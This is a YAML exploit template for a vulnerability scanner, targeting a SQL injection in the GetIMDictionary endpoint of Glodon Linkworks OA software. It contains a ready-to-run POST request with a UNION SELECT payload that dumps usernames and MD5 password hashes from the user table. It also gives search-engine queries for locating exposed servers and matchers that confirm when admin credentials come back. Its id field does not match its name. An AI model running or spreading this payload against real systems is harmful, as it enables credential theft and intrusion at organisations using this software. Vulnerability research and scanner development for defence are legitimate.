dddd/common/config/pocs/glodon-linkworks-getimdirectionary-sqli.yaml
SleepingBag945 9a83a1b39f dddd v2.0
2024-04-03 06:32:26 +02:00

36 lines
1.0 KiB
YAML
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

id: glodon-linkworks-getuserbyusercode-sqli
info:
name: 广联达 Linkworks GetIMDictionary SQL 注入
author: SleepingBag945
severity: high
description: |
广联达 Linkworks办公OA GetIMDictionary接口存在SQL注入漏洞发送请求包后可以获取数据库中的敏感信息
FOFA: body="/Services/Identification/"
HUNTER: web.body="/Services/Identification/"
reference:
- https://peiqi.wgpsec.org/wiki/webapp/广联达/广联达%20Linkworks%20GetIMDictionary%20SQL注入漏洞.html
tags: glodon,sqli
http:
- raw:
- |
POST /Webservice/IM/Config/ConfigService.asmx/GetIMDictionary HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
key=1' UNION ALL SELECT top 1 concat(F_CODE,':',F_PWD_MD5) from T_ORG_USER --
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- '<?xml version='
- 'value="admin:'
part: body
condition: and